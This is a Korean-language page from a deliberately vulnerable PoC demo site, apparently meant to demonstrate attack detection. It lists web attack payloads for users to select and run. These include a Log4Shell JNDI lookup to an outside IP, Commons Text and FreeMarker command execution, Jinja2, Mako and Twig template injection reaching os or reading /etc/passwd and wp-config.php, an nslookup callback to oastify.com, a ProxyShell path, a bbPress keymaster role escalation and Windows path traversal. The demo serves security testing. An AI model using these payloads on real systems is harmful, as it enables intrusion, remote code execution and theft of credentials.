PoC
홈
웹 공격
API
로그인
PoC
홈
웹 공격
API
로그인
애플리케이션 취약점 공격을 시작해 보세요.
공격 페이로드를 선택하고 실행하세요!
애플리케이션 취약점 공격
${script:javascript:java.lang.Runtime.getRuntime().exec(\”touch /tmp/tarlogic\”);}
autodiscover/autodiscover.json?a=hacker@mail.com/mapi/nspi
&user_pass=sbttb&bbp-forums-role=bbp_keymaster&redirect_to=%3Fcheckemail%3Dregistered&user_email=Gb1TOsS5
{{ '7'*7 }}
${${upper:j}nd${::-i}:${lower:l}${lower:d}a${lower:p}://50.50.50.50/a}
{{app.request.server.all|join(',')}}
{{'/etc/passwd'|file_excerpt(1,30)}}'@ {{include('wp-config.php')}}
{php system('nslookup oastify.com')}
?php $this->layout('template', ['title' => 'User Profile']) ?>
{{app.request.server.all|join(',')}}
{{request|attr([request.args.usc*2,request.args.class,
#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
{{self._TemplateReference__context.namespace.__init__.__globals__.os}}
{{self._TemplateReference__context.cycler.__init__.__globals__.os}}
${self.attr._NSAttr__parent.module.filters.compat.inspect.os.system
..\..\..\..\..\..\..\..\windows\system.ini
\..\WINDOWS\win.ini
\..\..\..\..\..\..\WINDOWS\win.ini
공격 실행
경고:
본 웹사이트는 테스트 목적으로만 사용되는 의도적으로 취약하게 설계된 데모용 웹사이트입니다.
©
Monitorapp.
All Right Reserved